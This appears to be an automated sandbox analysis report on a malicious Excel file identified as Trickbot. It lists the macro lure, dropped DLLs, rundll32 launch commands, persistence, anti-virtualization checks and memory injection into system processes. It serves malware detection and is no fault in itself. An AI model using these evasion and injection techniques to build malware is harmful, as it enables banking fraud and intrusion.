                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
                Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
                Source: unknownHTTPS traffic detected: 144.208.70.30:443 -> 192.168.2.22:49165 version: TLS 1.2

                E-Banking Fraud:

                barindex
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: Process Memory Space: wermgr.exe PID: 1776, type: MEMORY

                System Summary:

                barindex
                Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 14 Protected View
                Source: Screenshot number: 4Screenshot OCR: Enable content" to oerform Microsoft Office Decrvotion Core to start I ' ' ' 18 the decryption of
                Source: Document image extraction number: 2Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet. Protected View This fi
                Source: Document image extraction number: 2Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
                Source: Document image extraction number: 3Screenshot OCR: Enable Content
                Source: Document image extraction number: 4Screenshot OCR: Enable Editing
                Source: Document image extraction number: 13Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
                Source: Document image extraction number: 13Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
                Found Excel 4.0 Macro with suspicious formulasShow sources
                Source: SecuriteInfo.com.Heur.31681.xlsInitial sample: CALL
                Source: SecuriteInfo.com.Heur.31681.xlsInitial sample: EXEC
                Office process drops PE fileShow sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmouser[1].dllJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\fndskfnds.dfmJump to dropped file
                Source: C:\Windows\System32\wermgr.exeProcess Stats: CPU usage > 98%
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_00073410 NtDelayExecution,
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_00067C30 NtQueryInformationProcess,
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_0007C8E0 NtQuerySystemInformation,CLSIDFromString,DuplicateHandle,HeapFree,
                Source: C:\Windows\System32\wermgr.exeFile created: C:\Windows\system32\cn\Jump to behavior
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_00062810
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_00084030
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_00076890
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_0007C8E0
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_00065D60
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_0006D180
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_0006F600
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_0006CE60
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_000756D0
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_00068300
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_0006BB10
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_0006EF30
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_00063460
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_00065460
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_0007E460
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_0006A0A0
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_000684D0
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_0006ACD0
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_000838F0
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_00063D20
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_00062530
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_000611B0
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_0006D5D0
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_00077A10
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_0006AA20
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_00082E50
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_00071E60
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_0006CA80
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_0006C2B0
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_000796C0
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_00080720
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_00066F40
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_000823F0
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_0000000180011A74
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_0000000180016C20
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_000000018000FD48
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_000000018001AFC0
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_000000018000BFE4
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_00000001800110B4
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_00000001800130E8
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_00000001800020E8
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_00000001800011DC
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_000000018001822C
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_000000018001D2C0
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_0000000180020300
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_0000000180004320
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_0000000180008444
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_000000018001C4C8
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_0000000180001574
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_0000000180003594
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_00000001800076B8
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_00000001800026C0
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_000000018003B6C4
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_0000000180023780
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_0000000180036828
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_0000000180019860
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_0000000180025868
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_00000001800188B0
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_00000001800018CC
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_000000018000E8EC
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_00000001800158F8
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_000000018003396C
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_0000000180002A24
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_000000018008FC84
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_0000000180014D24
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_0000000180002D88
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_0000000180007D89
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_0000000180083E30
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_000000018008BE3C
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_0000000180024EC0
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_0000000180003F38
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_000000018000BFE0
                Source: SecuriteInfo.com.Heur.31681.xlsOLE indicator, VBA macros: true
                Source: SecuriteInfo.com.Heur.31681.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
                Source: rundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLS@14/16@5/5
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_0006E420 LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_000000018000B848 LookupPrivilegeValueA,AdjustTokenPrivileges,
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_000000018000BB84 CreateToolhelp32Snapshot,Process32First,Process32Next,StrStrIA,
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_0006BA20 CoCreateInstance,
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DATJump to behavior
                Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{79ED1AB7-4F83-DE32-0BD1-4533166B87A7}
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD6CE.tmpJump to behavior
                Source: SecuriteInfo.com.Heur.31681.xlsOLE indicator, Workbook stream: true
                Source: C:\Windows\System32\wermgr.exeSystem information queried: HandleInformation
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                Source: C:\Windows\System32\wermgr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\wermgr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\wermgr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\wermgr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\cmd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\cmd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\fndskfnds.dfm,StartW
                Source: SecuriteInfo.com.Heur.31681.xlsReversingLabs: Detection: 12%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\fndskfnds.dfm,StartW
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fndskfnds.dfm,StartW
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {A9986821-F5E8-4178-8C7A-712EEA14850B} S-1-5-18:NT AUTHORITY\System:Service:
                Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\iDownloadManager1882563550\kufndskfndszi.dwn',StartW
                Source: C:\Windows\System32\wermgr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
                Source: C:\Windows\System32\wermgr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\fndskfnds.dfm,StartW
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fndskfnds.dfm,StartW
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Windows\System32\wermgr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
                Source: C:\Windows\System32\wermgr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
                Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\iDownloadManager1882563550\kufndskfndszi.dwn',StartW
                Source: C:\Windows\System32\taskeng.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92BDB7E4-F28B-46A0-B551-45A52BDD5125}\InprocServer32
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E821032 StartW,VirtualAlloc,VirtualFree,LoadLibraryA,GetProcAddress,MessageBoxA,SendMessageA,SetTimer,KillTimer,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00290B40 push dword ptr [edx+14h]; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00290205 push edx; iretd
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00290AD8 push dword ptr [edx+14h]; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00290B10 push dword ptr [edx+14h]; ret
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_00086E83 push es; ret
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_000000018004047A push ebp; ret
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_000000018003259D push edi; ret
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmouser[1].dllJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\fndskfnds.dfmJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\fndskfnds.dfmJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\fndskfnds.dfmJump to dropped file

                Boot Survival:

                barindex
                Drops PE files to the user root directoryShow sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\fndskfnds.dfmJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion:

                barindex
                Found evasive API chain (trying to detect sleep duration tampering with parallel thread)Show sources
                Source: C:\Windows\System32\wermgr.exeFunction Chain: threadCreated,threadDelayed,threadDelayed,userTimerSet,threadDelayed,threadDelayed,fileVolumeQueried,adjustToken,handleClosed,systemQueried,systemQueried,threadDelayed,mutantCreated,threadInformationSet,threadInformationSet,languageOrLocalQueried,threadDelayed,threadDelayed,threadDelayed,threadInformationSet,threadInformationSet,systemQueried,systemQueried,fileOpened,directoryQueried
                Tries to detect virtualization through RDTSC time measurementsShow sources
                Source: C:\Windows\System32\wermgr.exeRDTSC instruction interceptor: First address: 0000000000067D50 second address: 0000000000067D50 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 ret 0x0000000a dec esp 0x0000000b mov edi, eax 0x0000000d call dword ptr [0002396Eh] 0x00000013 jmp 00007FE928B24D30h 0x00000015 jmp dword ptr [0007C47Ah] 0x0000001b mov ecx, dword ptr [7FFE0004h] 0x00000022 dec eax 0x00000023 mov eax, dword ptr [7FFE0320h] 0x0000002a dec eax 0x0000002b imul eax, ecx 0x0000002e dec eax 0x0000002f shr eax, 18h 0x00000032 ret 0x00000033 inc esp 0x00000034 mov esi, eax 0x00000036 dec ecx 0x00000037 mov eax, edi 0x00000039 dec eax 0x0000003a not eax 0x0000003c dec eax 0x0000003d mov ebx, 6CEE0E00h 0x00000042 xor edx, edx 0x00000044 inc ecx 0x00000045 xchg byte ptr [eax+0Bh], cl 0x00000048 fmul dword ptr [ebx-17280808h] 0x0000004e aaa 0x0000004f arpl word ptr [eax], ax 0x00000051 add byte ptr [edi], cl
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_00067D50 rdtsc
                Source: C:\Windows\System32\wermgr.exeCode function: GetAdaptersInfo,
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmouser[1].dllJump to dropped file
                Source: C:\Windows\System32\taskeng.exe TID: 2948Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\System32\cmd.exe TID: 2228Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\System32\cmd.exe TID: 2960Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_00062E60 FindFirstFileW,FindNextFileW,
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_00063B00 FindFirstFileW,
                Source: C:\Windows\System32\cmd.exeCode function: 9_2_00000001800225AC GetSystemInfo,
                Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 43489
                Source: C:\Windows\System32\cmd.exeThread delayed: delay time: 30000
                Source: C:\Windows\System32\cmd.exeProcess information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_00067D50 rdtsc
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_00072AD0 LdrLoadDll,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E821032 StartW,VirtualAlloc,VirtualFree,LoadLibraryA,GetProcAddress,MessageBoxA,SendMessageA,SetTimer,KillTimer,
                Source: C:\Windows\System32\cmd.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\wermgr.exeCode function: 5_2_0006F600 SleepEx,SetTimer,RtlAddVectoredExceptionHandler,

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Allocates memory in foreign processesShow sources
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\wermgr.exe base: 60000 protect: page execute and read and write
                Hijacks the control flow in another processShow sources
                Source: C:\Windows\System32\wermgr.exeMemory written: PID: 3068 base: 1800B5000 value: FF
                Source: C:\Windows\System32\wermgr.exeMemory written: PID: 1688 base: 180079000 value: FF
                Writes to foreign memory regionsShow sources
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\wermgr.exe base: 60000
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\wermgr.exe base: FFF593F8
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 60000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 70000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 49D790B4
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 140000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 70000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 140000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 70000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
                Source: C:\Windows\System32\wermgr.exeMemory written: C:\Windows\System32\cmd.exe base: 130000
